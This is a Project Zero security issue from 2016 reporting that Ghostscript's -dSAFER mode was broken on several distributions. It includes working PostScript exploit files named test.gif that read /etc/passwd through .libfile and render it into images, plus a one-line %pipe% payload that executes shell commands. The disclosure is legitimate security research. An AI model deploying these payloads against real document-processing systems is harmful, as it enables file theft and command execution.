New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Sep 2016
Cc:



Sign in to add a comment
ghostscript: -dSAFER stopped working
Project Member Reported by taviso@google.com, Sep 29 2016 Back to list
During a mailing list discussion I noticed that -dSAFER, a ghostscript parameter that is used when handling untrusted documents, was broken on RHEL, Debian and Ubuntu (maybe more).

Some more investigation revealed that the bug was already fixed upstream, but because they never allocated a CVE or informed distributions about the security impact many distributions didn't update.

This could result in arbitrary file disclosure on systems that process pdf, ps, use ImageMagick or graphicsmagick, etc. You can easily imagine other complicated attacks on non-automated system by modifying output based on file contents, etc, etc.

The bug is already public, just recording here for reference.

Use of ghostscript as a backend with -dSAFER is extremely common:

https://codesearch.debian.net/search?q=-dSAFER&perpkg=1

$ cat test.gif
%!PS
/Font /Helvetica-Bold findfont def
/FontSize 12 def
Font FontSize scalefont setfont

/dumpname {
    dup             % copy filename
    dup             % copy filename
    print           % print filename
    (\n) print      % print newlinea
    status          % stat filename
    {
        (stat succeeded\n) print
        ( ctime:) print
        64 string cvs print
        ( atime:) print
        64 string cvs print
        ( size:) print
        64 string cvs print
        ( blocks:) print
        64 string cvs print
        (\n) print
        (\n) print
    }{
        (unable to stat\n\n) print
    } ifelse
    .libfile        % open as library
    {
        (.libfile returned file\n\n) print
        64 string readstring
        pop         % discard result (should proably test)
        dup         % copy read string
        print       % write to stdout
        % write to output
        newpath 0 0 moveto show showpage
        (\n) print
    }{
        (.libfile returned string\n) print
        print
        (\n) print
    } ifelse
} def

(/etc/passwd) /dumpname load 256 string filenameforall
$ convert test.gif png:test.png
<creates a file called test.png containing first line of /etc/passwd>


 
Project Member Comment 1 by taviso@google.com, Sep 29 2016
Labels: -Restrict-View-Commit
Project Member Comment 2 by taviso@google.com, Sep 29 2016
Summary: ghostscript: -dSAFER stopped working (was: ghsotscript: -dSAFER stopped working)
Project Member Comment 3 by taviso@google.com, Sep 30 2016
Here's a more complete example test file.
test.gif
605 bytes View Download
Project Member Comment 4 by taviso@google.com, Sep 30 2016
$ cat test.gif
%!PS
/Size 20 def                             % font/line size
/Line 0 def                              % current line
/Buf 1024 string def                     % line buffer
/Path 0 newpath def

/Courier-Bold findfont Size scalefont setfont
1 1 1 setrgbcolor clippath fill          % draw white background
0 0 0 setrgbcolor                        % set black foreground

(/etc/passwd) .libfile {
    {
        dup Buf readline
        {
            Path Line moveto show
        }{
            showpage
            quit
        } ifelse
        % next line
        /Line Line Size add def
    } loop
} if

Project Member Comment 5 by taviso@google.com, Sep 30 2016
I noticed a way to get command execution in version 9.18 and higher:

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) .putdeviceparams
quit
$ convert test.gif png:test.png
uid=1000(taviso)

Should also work in evince, gimp, graphicsmagick, etc.
Sign in to add a comment